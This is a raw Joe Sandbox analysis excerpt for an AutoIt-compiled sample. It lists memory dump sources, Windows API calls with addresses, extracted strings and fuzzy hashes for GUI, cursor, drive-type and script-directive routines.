                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: c2f78785a617c96437ea248451ff2a97e6fc609846b8405c10b499ac75ed8d13
                                          • Instruction ID: 227f9c9f79c318511fe04392e74267a7196ee289fe7499ca8d75b66d9f64f95d
                                          • Opcode Fuzzy Hash: c2f78785a617c96437ea248451ff2a97e6fc609846b8405c10b499ac75ed8d13
                                          • Instruction Fuzzy Hash: 8AA19071A00215BFEB14DBA5DD4AFAEBBB9EB48711F004516FA14B72E0D770AD04CBA0
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E3AF89
                                          • GetDriveTypeW.KERNEL32(?,00E5FAC0,?,\\.\,00E5F910), ref: 00E3B066
                                          • SetErrorMode.KERNEL32(00000000,00E5FAC0,?,\\.\,00E5F910), ref: 00E3B1C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: 021c2a8fcd2ba937fa9978f101333f86a1f97b7814b139b6487ad998146e9b72
                                          • Instruction ID: 541f1769f92606157a1a410222261f9c1836ec81be9f9e0a67070b7028f70919
                                          • Opcode Fuzzy Hash: 021c2a8fcd2ba937fa9978f101333f86a1f97b7814b139b6487ad998146e9b72
                                          • Instruction Fuzzy Hash: 2C51C630681305EB9B04EB10C9AA9BD7BB0EB14345F247027F60FB7291D7B69D41EB92
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 1038674560-86951937
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00DD2CA2
                                          • DeleteObject.GDI32(00000000), ref: 00DD2CE8
                                          • DeleteObject.GDI32(00000000), ref: 00DD2CF3
                                          • DestroyCursor.USER32(00000000), ref: 00DD2CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00DD2D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E0C68B
                                          • 6F540200.COMCTL32(?,000000FF,?), ref: 00E0C6C4
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E0CAED
                                            • Part of subcall function 00DD1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DD2036,?,00000000,?,?,?,?,00DD16CB,00000000,?), ref: 00DD1B9A
                                          • SendMessageW.USER32(?,00001053), ref: 00E0CB2A
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E0CB41
                                          Strings
                                          Similarity
                                          • API ID: DestroyMessageSendWindow$DeleteObject$CursorF540200InvalidateMoveRect
                                          • String ID: 0
                                          • API String ID: 22932394-4108050209
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 00E5AB99
                                          • SetTextColor.GDI32(?,?), ref: 00E5AB9D
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E5ABB3
                                          • GetSysColor.USER32(0000000F), ref: 00E5ABBE
                                          • CreateSolidBrush.GDI32(?), ref: 00E5ABC3
                                          • GetSysColor.USER32(00000011), ref: 00E5ABDB
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E5ABE9
                                          • SelectObject.GDI32(?,00000000), ref: 00E5ABFA
                                          • SetBkColor.GDI32(?,00000000), ref: 00E5AC03
                                          • SelectObject.GDI32(?,?), ref: 00E5AC10
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E5AC2F
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E5AC46
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E5AC5B
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E5ACA7
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E5ACCE
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00E5ACEC
                                          • DrawFocusRect.USER32(?,?), ref: 00E5ACF7
                                          • GetSysColor.USER32(00000011), ref: 00E5AD05
                                          • SetTextColor.GDI32(?,00000000), ref: 00E5AD0D
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E5AD21
                                          • SelectObject.GDI32(?,00E5A869), ref: 00E5AD38
                                          • DeleteObject.GDI32(?), ref: 00E5AD43
                                          • SelectObject.GDI32(?,?), ref: 00E5AD49
                                          • DeleteObject.GDI32(?), ref: 00E5AD4E
                                          • SetTextColor.GDI32(?,?), ref: 00E5AD54
                                          • SetBkColor.GDI32(?,?), ref: 00E5AD5E
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E58D34
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E58D45
                                          • CharNextW.USER32(0000014E), ref: 00E58D74
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E58DB5
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E58DCB
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E58DDC
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E58DF9
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00E58E45
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E58E5B
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E58E8C
                                          • _memset.LIBCMT ref: 00E58EB1
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E58EFA
                                          • _memset.LIBCMT ref: 00E58F59
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E58F83
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E58FDB
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00E59088
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E590AA
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E590F4
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E59121
                                          • DrawMenuBar.USER32(?), ref: 00E59130
                                          • SetWindowTextW.USER32(?,0000014E), ref: 00E59158
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00E54C51
                                          • GetDesktopWindow.USER32 ref: 00E54C66
                                          • GetWindowRect.USER32(00000000), ref: 00E54C6D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E54CCF
                                          • DestroyWindow.USER32(?), ref: 00E54CFB
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E54D24
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E54D42
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E54D68
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00E54D7D
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E54D90
                                          • IsWindowVisible.USER32(?), ref: 00E54DB0
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E54DCB
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E54DDF
                                          • GetWindowRect.USER32(?,?), ref: 00E54DF7
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00E54E1D
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00E54E37
                                          • CopyRect.USER32(?,?), ref: 00E54E4E
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00E54EB9
                                          Strings
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DD28BC
                                          • GetSystemMetrics.USER32(00000007), ref: 00DD28C4
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00DD28EF
                                          • GetSystemMetrics.USER32(00000008), ref: 00DD28F7
                                          • GetSystemMetrics.USER32(00000004), ref: 00DD291C
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00DD2939
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00DD2949
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00DD297C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00DD2990
                                          • GetClientRect.USER32(00000000,000000FF), ref: 00DD29AE
                                          • GetStockObject.GDI32(00000011), ref: 00DD29CA
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD29D5
                                            • Part of subcall function 00DD2344: GetCursorPos.USER32(?), ref: 00DD2357
                                            • Part of subcall function 00DD2344: ScreenToClient.USER32(00E967B0,?), ref: 00DD2374
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000001), ref: 00DD2399
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000002), ref: 00DD23A7
                                          • SetTimer.USER32(00000000,00000000,00000028,00DD1256), ref: 00DD29FC
                                          Strings
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 390803403-1459072770
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E540F6
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00E541B6
                                          Strings
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 3974292440-719923060
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00E45309
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00E45314
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00E4531F
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00E4532A
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00E45335
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00E45340
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00E4534B
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00E45356
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00E45361
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00E4536C
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00E45377
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00E45382
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00E4538D
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00E45398
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00E453A3
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00E453AE
                                          • GetCursorInfo.USER32(?), ref: 00E453BE
                                          • GetLastError.KERNEL32(00000001,00000000), ref: 00E453E9
                                          Similarity
                                          • API ID: Cursor$Load$ErrorInfoLast
                                          • String ID:
                                          • API String ID: 3215588206-0
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E2AAA5
                                          • __swprintf.LIBCMT ref: 00E2AB46
                                          • _wcscmp.LIBCMT ref: 00E2AB59
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E2ABAE
                                          • _wcscmp.LIBCMT ref: 00E2ABEA
                                          • GetClassNameW.USER32(?,?,00000400), ref: 00E2AC21
                                          • GetDlgCtrlID.USER32(?), ref: 00E2AC73
                                          • GetWindowRect.USER32(?,?), ref: 00E2ACA9
                                          • GetParent.USER32(?), ref: 00E2ACC7
                                          • ScreenToClient.USER32(00000000), ref: 00E2ACCE
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E2AD48
                                          • _wcscmp.LIBCMT ref: 00E2AD5C
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00E2AD82
                                          • _wcscmp.LIBCMT ref: 00E2AD96
                                            • Part of subcall function 00DF386C: _iswctype.LIBCMT ref: 00DF3874
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: 342e041622634ca8dbf054ae131783cd2c1d2afa6d0f3e4c1ccd3f8461c3ec93
                                          • Instruction ID: 99f374172b41825d9681bbfc5eb1cfe3880acdc16d7c6a344b82f494d45aa690
                                          • Opcode Fuzzy Hash: 342e041622634ca8dbf054ae131783cd2c1d2afa6d0f3e4c1ccd3f8461c3ec93
                                          • Instruction Fuzzy Hash: 0FA1E471204726AFD718DF20D884BAAF7E8FF44319F189639F999E2150D730E945CBA2
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00E2B3DB
                                          • _wcscmp.LIBCMT ref: 00E2B3EC
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E2B414
                                          • CharUpperBuffW.USER32(?,00000000), ref: 00E2B431
                                          • _wcscmp.LIBCMT ref: 00E2B44F
                                          • _wcsstr.LIBCMT ref: 00E2B460
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E2B498
                                          • _wcscmp.LIBCMT ref: 00E2B4A8
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E2B4CF
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00E2B518
                                          • _wcscmp.LIBCMT ref: 00E2B528
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00E2B550
                                          • GetWindowRect.USER32(00000004,?), ref: 00E2B5B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: d3b2915f6efb152d3888c425db41c9d6400061edb25df79682d686ca6eced0a7
                                          • Instruction ID: 96494f82c5e63db706c90a974a2602312e8c3c5d843d7b37e90de42c0f89639f
                                          • Opcode Fuzzy Hash: d3b2915f6efb152d3888c425db41c9d6400061edb25df79682d686ca6eced0a7
                                          • Instruction Fuzzy Hash: 9C81D4710043199FDB04DF10E885FAA77E9FF44318F08956AFD85AA092EB34DD49CBA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: c9bb407ce5e9d960c90a7fc6936a919740eb39086709f33c603262c8f1884393
                                          • Instruction ID: 9416e181797f2d5773efbc165b0268d69b2d02e5b676132d7463f83b8eb76e9b
                                          • Opcode Fuzzy Hash: c9bb407ce5e9d960c90a7fc6936a919740eb39086709f33c603262c8f1884393
                                          • Instruction Fuzzy Hash: B9316D32A44319E6DB14FA60ED43EFE77A4DF10750F64212AB44A711E2FF62AE04D671
                                          APIs
                                          • LoadIconW.USER32(00000063), ref: 00E2C4D4
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E2C4E6
                                          • SetWindowTextW.USER32(?,?), ref: 00E2C4FD
                                          • GetDlgItem.USER32(?,000003EA), ref: 00E2C512
                                          • SetWindowTextW.USER32(00000000,?), ref: 00E2C518
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E2C528
                                          • SetWindowTextW.USER32(00000000,?), ref: 00E2C52E
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E2C54F
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E2C569
                                          • GetWindowRect.USER32(?,?), ref: 00E2C572
                                          • SetWindowTextW.USER32(?,?), ref: 00E2C5DD
                                          • GetDesktopWindow.USER32 ref: 00E2C5E3
                                          • GetWindowRect.USER32(00000000), ref: 00E2C5EA
                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E2C636
                                          • GetClientRect.USER32(?,?), ref: 00E2C643
                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E2C668
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E2C693
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          • Opcode ID: 08ace9e685bd6ae158bad6f3ad7d1c79354f0eb88ec5605ba0c67cbf0b63641f
                                          • Instruction ID: c5266c6271762fc06ef174dbdba3169236e2111617433c7496631192a26abacb
                                          • Opcode Fuzzy Hash: 08ace9e685bd6ae158bad6f3ad7d1c79354f0eb88ec5605ba0c67cbf0b63641f
                                          • Instruction Fuzzy Hash: EA516B70900709AFDB209FA9DD89B6FBBF5FF04705F104929E686B25A0C775E948CB50
                                          APIs
                                          • _memset.LIBCMT ref: 00E5A4C8
                                          • DestroyWindow.USER32(?,?), ref: 00E5A542
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E5A5BC
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E5A5DE
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E5A5F1
                                          • DestroyWindow.USER32(00000000), ref: 00E5A613
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DD0000,00000000), ref: 00E5A64A
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E5A663
                                          • GetDesktopWindow.USER32 ref: 00E5A67C
                                          • GetWindowRect.USER32(00000000), ref: 00E5A683
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E5A69B
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E5A6B3
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: 2e16a0ebd53101e2599e3daf4e394e550ce36fa3bd48dcfcdb795d9f299d85eb
                                          • Instruction ID: d533e52aea1ec7c06e37738cb7dc74b13e5080b95afd679dfc5896d8f5951a0a
                                          • Opcode Fuzzy Hash: 2e16a0ebd53101e2599e3daf4e394e550ce36fa3bd48dcfcdb795d9f299d85eb
                                          • Instruction Fuzzy Hash: 0371B175140305AFD724DF28DC49F667BE5FB88305F084A2EF985A72A0D7B0E909CB62
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E546AB
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E546F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 63727495e53134ba9d3fa9259d949421b1a058df460efc3b52493932db5b4a9c
                                          • Instruction ID: 59f0314995d9c326066e2b1221818ea5cf6116b0edd78f955af7b6feee0cbebd
                                          • Opcode Fuzzy Hash: 63727495e53134ba9d3fa9259d949421b1a058df460efc3b52493932db5b4a9c
                                          • Instruction Fuzzy Hash: AE917F742043159BCB14EF20C851A6AB7E1EF85318F04A85DFC9A6B7A3DB31ED49CB61
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E5BB6E
